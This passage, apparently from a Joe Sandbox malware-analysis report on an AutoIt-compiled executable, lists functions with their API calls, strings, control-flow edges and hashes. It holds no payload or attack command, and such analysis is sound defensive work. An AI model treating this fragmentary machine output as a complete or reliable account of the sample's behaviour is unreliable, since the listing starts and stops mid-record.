1610->1463 1610->1495 1612 46f2d0-46f2f6 call 402250 * 3 1611->1612 1613 46f19b-46f1af call 40e0a0 1611->1613 1613->1463
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 0046EE79
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 0046F265
                                                                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 0046F29A
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0046F356
                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(00000000), ref: 0046F35D
                                                                                                                                                                                                                                                            • EnumWindows.USER32(0046130D,?), ref: 0046F365
                                                                                                                                                                                                                                                              • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                                                                                                                                                                                                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                                                                                                            • API String ID: 329138477-1919597938
                                                                                                                                                                                                                                                            • Opcode ID: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                                                                                                            • Instruction ID: 15289122aec5319afe5b60ce0d71565fabc5791e0031d8771947120ab82528ab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eb0f3ae9a0304a5d069b7ca5d1222961736e80184ced8954434bc01324a9774
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83F10B714143019BDB00FF61D885AAFB3A4BF85308F44496FF94567282E779E909CBA7
                                                                                                                                                                                                                                                            Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104,?), ref: 00401F4C
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                                                                                                                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LKxcbzlwkz.exe,00000104), ref: 00428B5B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\LKxcbzlwkz.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                                                                                                            • API String ID: 3948761352-214076062
                                                                                                                                                                                                                                                            • Opcode ID: fb742eb3e3b9472f662d9eb0d9266b7c596f0002b12228fde03e2c1a898d0588
                                                                                                                                                                                                                                                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb742eb3e3b9472f662d9eb0d9266b7c596f0002b12228fde03e2c1a898d0588
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                                                                                                                                                            Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                                                                                                            • String ID: D)E$D)E$FILE
                                                                                                                                                                                                                                                            • API String ID: 3888824918-361185794
                                                                                                                                                                                                                                                            • Opcode ID: c1a842079991e0571ddd3d2373b9fc1db2fff56e847d73cfd386b3e85dd9681d
                                                                                                                                                                                                                                                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1a842079991e0571ddd3d2373b9fc1db2fff56e847d73cfd386b3e85dd9681d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                                                                                                                                                                            Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                                                                                                                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                            • _wcsncat.LIBCMT ref: 0040E433
                                                                                                                                                                                                                                                            • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                                                                                                                                                                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 0040E487
                                                                                                                                                                                                                                                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00427541
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00427551
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00427562
                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 0042757C
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                                                                                                                                                                            • String ID: Include$\
                                                                                                                                                                                                                                                            • API String ID: 3173733714-3429789819
                                                                                                                                                                                                                                                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                                                                                                                                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                                                                                                                                                            Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 0045292B
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                                                                                                                                                                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452961
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452971
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 004529BF
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 004529CA
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 004529D6
                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00452A17
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00452A20
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1255752989-0
                                                                                                                                                                                                                                                            • Opcode ID: 3b6620f45ba38e4c5fadb777145c18bd0d1596e00bc77684767aaa6d3528f01d
                                                                                                                                                                                                                                                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b6620f45ba38e4c5fadb777145c18bd0d1596e00bc77684767aaa6d3528f01d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                                                                                                                                                                            Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                                                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                                                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(00B26C98,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                                                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                                                                                                                                                                            Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                                                                                                                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                                                                                                                                                                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00B26C98,000000FF,00000000), ref: 00410552
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                                                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                                                                                                                                                                            Function 0046BEB2 Relevance: 16.9, APIs: 11, Instructions: 400registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 1916 46beb2-46bf55 call 40bc70 * 3 call 40e710 call 45340c call 401b10 call 463980 call 46379b 1933 46bf57-46bf6b call 403c90 1916->1933 1934 46bf70-46bf7c call 436565 1916->1934 1939 46c324-46c347 call 402250 * 3 1933->1939 1940 46bfc5 1934->1940 1941 46bf7e-46bf95 RegConnectRegistryW 1934->1941 1942 46bfc9-46bfe9 RegOpenKeyExW 1940->1942 1944 46bf97-46bfba call 403cd0 call 403c90 1941->1944 1945 46bfbf-46bfc3 1941->1945 1946 46c022-46c055 call 45340c RegQueryValueExW 1942->1946 1947 46bfeb-46c004 call 403cd0 1942->1947 1944->1939 1945->1942 1960 46c057-46c087 call 403cd0 call 403c90 RegCloseKey 1946->1960 1961 46c092-46c0ab call 403cd0 1946->1961 1958 46c006-46c007 RegCloseKey 1947->1958 1959 46c00d-46c01d call 403c90 1947->1959 1958->1959 1959->1939 1960->1939 1980 46c08d 1960->1980 1971 46c0b1 1961->1971 1972 46c2fc-46c307 call 403c90 1961->1972 1971->1972 1976 46c297-46c2c5 call 453132 call 45340c RegQueryValueExW 1971->1976 1977 46c23e-46c275 call 45340c RegQueryValueExW 1971->1977 1978 46c15b-46c1a6 call 4115d7 call 45340c RegQueryValueExW 1971->1978 1979 46c0b8-46c0ff call 4115d7 call 45340c RegQueryValueExW 1971->1979 1982 46c30c-46c31f RegCloseKey 1972->1982 1976->1982 2005 46c2c7-46c2fa call 403cd0 call 403c90 call 408f40 1976->2005 1991 46c277 1977->1991 1992 46c27d-46c295 call 408f40 1977->1992 2003 46c211-46c239 call 403cd0 call 403c90 call 4111dc 1978->2003 2004 46c1a8-46c1bf 1978->2004 2001 46c101-46c125 call 40e710 call 4111dc 1979->2001 2002 46c12a-46c156 call 403cd0 call 403c90 call 4111dc 1979->2002 1986 46c321-46c322 RegCloseKey 1980->1986 1982->1939 1982->1986 1986->1939 1991->1992 1992->1982 2001->1982 2002->1982 2003->1982 2009 46c1c1-46c1c7 2004->2009 2010 46c1fc-46c20c call 40e710 call 4111dc 2004->2010 2005->1982 2016 46c1ce-46c1d2 2009->2016 2017 46c1c9-46c1ca 2009->2017 2010->1982 2019 46c1d4-46c1d9 2016->2019 2020 46c1ed-46c1f3 2016->2020 2017->2016 2026 46c1db-46c1e4 2019->2026 2027 46c1e8-46c1eb 2019->2027 2020->2010 2029 46c1f5-46c1f7 2020->2029 2026->2027 2027->2019 2027->2020 2029->2010
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BF8D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
